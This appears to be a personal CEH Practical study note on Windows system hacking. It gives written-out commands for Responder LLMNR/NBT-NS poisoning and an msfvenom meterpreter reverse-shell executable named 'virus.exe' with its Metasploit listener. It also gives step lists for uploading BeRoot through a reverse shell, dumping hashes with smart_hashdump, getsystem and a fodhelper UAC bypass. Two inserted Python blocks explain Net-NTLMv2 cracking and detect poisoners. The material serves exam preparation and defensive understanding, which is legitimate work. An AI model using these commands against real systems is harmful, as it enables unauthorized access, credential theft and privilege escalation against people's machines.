System Hacking

Welcome to the System Hacking module. This note will guide you through all the methodologies that I used while preparing for the CEH (Practical) exam.


Last updated 2 years ago

Introduction

System hacking is the compromise of computer systems and software in order to access a target computer and steal or misuse its sensitive information. The attacker, or the malware they deploy, identifies and exploits a vulnerability in the computer system to gain unauthorized access.

Steps involved in System Hacking

  1. Gaining Access

  2. Escalating Privileges

  3. Maintaining Access

  4. Clearing Logs

NTLM

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity.

Responder

The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix.

chmod +x Responder.py              # make the script executable
sudo ./Responder.py -I eth0        # poison and serve on interface eth0 with the default services
Responder.py -I eth0 -dwrv         # -r adds the Workstation Service answers described above, -w starts the WPAD rogue proxy, -v is verbose; -d differs by version, check ./Responder.py --help
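A defender-side check that follows directly from how Responder works, added here as an example (it is not from the page or from the Responder project): query LLMNR for a random name that no host can own, and treat any answer as evidence of a poisoner on the segment. It assumes the host can send to the LLMNR multicast group 224.0.0.252 on UDP 5355; the response bytes in the comments are constructed.

```python
# Added example (not from the page or Responder): an LLMNR "honey query" poisoner check.
import os, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def skip_name(pkt: bytes, off: int) -> int:
    """Return the offset just past a (possibly compressed) name."""
    while True:
        length = pkt[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer: two bytes, ends the name
            return off + 2
        off += 1 + length

def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR reuses the DNS wire format: header (id, flags, counts) + one A/IN question."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def parse_llmnr_answers(pkt: bytes, txid: int) -> list:
    """Return the IPv4 addresses in A records of a response to our transaction id."""
    if len(pkt) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if rid != txid or not flags & 0x8000:  # wrong id, or QR bit clear (not a response)
        return []
    off = 12
    for _ in range(qd):  # skip the echoed question(s): name + type + class
        off = skip_name(pkt, off) + 4
    ips = []
    for _ in range(an):
        off = skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", pkt[off:off + 10]); off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return ips

def probe(timeout: float = 2.0) -> list:
    """Ask for a random name nobody owns; legitimate hosts stay silent, a poisoner answers."""
    name, txid = "hn-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []  # (responding host, address it claims for the name)
    try:
        while True:
            data, src = sock.recvfrom(2048)
            hits += [(src[0], ip) for ip in parse_llmnr_answers(data, txid)]
    except socket.timeout:
        return hits

if __name__ == "__main__":
    for src, claimed in probe():
        print(f"LLMNR answer from {src} (claims {claimed}): possible poisoner")
```

Run it periodically from a workstation on each VLAN; a hit identifies the poisoning host, and disabling LLMNR and NBT-NS via group policy removes the opportunity entirely.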

Cracking NTLM Hash using John-The-Ripper

John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It works from wordlists of candidate passwords: each candidate is hashed in the target's format and compared with the captured hash, and any match reveals the password.
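What John actually computes when it cracks a Responder capture, as an added example that is not the page's or John's code: the Net-NTLMv2 proof is rebuilt from a candidate password and compared with the captured one. MD4 is implemented in pure Python because hashlib often lacks it; the user, domain, challenge and capture line are constructed values.

```python
# Added example (not from the page or from John/Responder): what a Net-NTLMv2 "crack" computes.
import hmac, struct
from hashlib import md5

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): hashlib's md4 is often disabled under OpenSSL 3."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    bitlen = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bitlen)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [  # (mix function, shift amounts, message-word order, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), (3, 7, 11, 19), range(16), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), 0x6ED9EBA1),
    ]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = h
        for f, s, order, k in rounds:
            for i, j in enumerate(order):
                a = rot((a + f(b, c, d) + x[j] + k) & 0xFFFFFFFF, s[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: the next step updates what was d
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password (the value smart_hashdump dumps)."""
    return md4(password.encode("utf-16le"))

def ntlmv2_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user)+domain), challenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), md5).digest()
    return hmac.new(key, server_challenge + blob, md5).digest()

def check_capture(line: str, wordlist):
    """line is in Responder/John format user::DOMAIN:challenge:NTProofStr:blob (hex); returns the match or None."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for cand in wordlist:
        if hmac.compare_digest(ntlmv2_proof(cand, user, domain, chal, blob), proof):
            return cand
    return None

# Constructed sample (not a real capture): the line "alice" in "CORP" would produce for
# password "Winter2023!", with a fixed server challenge and a minimal client blob.
_CHAL = bytes.fromhex("0123456789abcdef")
_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 8
SAMPLE_LINE = "alice::CORP:%s:%s:%s" % (_CHAL.hex(), ntlmv2_proof("Winter2023!", "alice", "CORP", _CHAL, _BLOB).hex(), _BLOB.hex())

if __name__ == "__main__":
    print(check_capture(SAMPLE_LINE, ["password", "Summer2023!", "Winter2023!"]))
```

John does the same work with --format=netntlmv2 on the Responder log line, only far faster; the point to take away is that a captured Net-NTLMv2 response for a weak password is an offline guessing problem, so password strength and disabling LLMNR/NBT-NS are the controls.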

Backdoor Using Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Crafting Windows executable through MSFVenom

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe

Setting up reverse listener using msfconsole

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-IP-ADDRESS
set LPORT ANY-FREE-PORT
exploit

PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is made up of a number of modules and scripts; the project README linked below lists them.

Must Read this tutorial

Armitage

Armitage is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.

Hacking Microsoft Office with Macro

Privesc Windows Machine using BeRoot

Steps you can replicate

  1. Upload BeRoot.exe to the machine through the reverse shell.

  2. Interact with the Windows shell.

  3. Run BeRoot.exe.

  4. Run post/windows/gather/smart_hashdump.

  5. To get SYSTEM privileges, try "getsystem -t 1". If it fails, follow the next step.

  6. Let's try another exploit: "use exploit/windows/local/bypassuac_fodhelper" and set the session for that exploit.

  7. After the exploit runs, try "getuid", "getsystem -t 1", "getuid".

  8. Run post/windows/gather/smart_hashdump.

Other Methodology:

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool only responds to File Server Service requests, which are for SMB.


BeRoot Project is a post-exploitation tool that checks for common misconfigurations to find a way to escalate our privileges. It has been added to the pupy project as a post-exploitation module (so it runs in memory without touching the disk). The tool does not perform any exploitation itself. Its main goal is not a full configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only the information that has been found to be a potential path for privilege escalation.

Links

  • http://support.microsoft.com/kb/163409 (NetBIOS name suffixes)
  • pupy
  • LM, NTLM, Net-NTLMv2, oh my! (Medium) - this Medium post might give you an idea about NTLM hashes
  • GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
  • Gaining Credentials Easily with Responder Tool (Medium) - this might be useful, give it a read
  • GitHub - openwall/john: John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs
  • John The Ripper Hash Formats (pentestmonkey)
  • GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework
  • jtr-cheat-sheet.pdf (471KB): https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf
  • Hack Like a Pro: How to Use PowerSploit, Part 1 (Evading Antivirus Software) (WonderHowTo)
  • GitHub - r00t0v3rr1d3/armitage: Fork from @rsmudge/armitage
  • Armitage Homepage
  • https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-framework (yeahhub.com)
  • GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / Mac
  • Bypassing Windows 10 UAC with Python (Medium)
  • Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key) (Hacking Articles)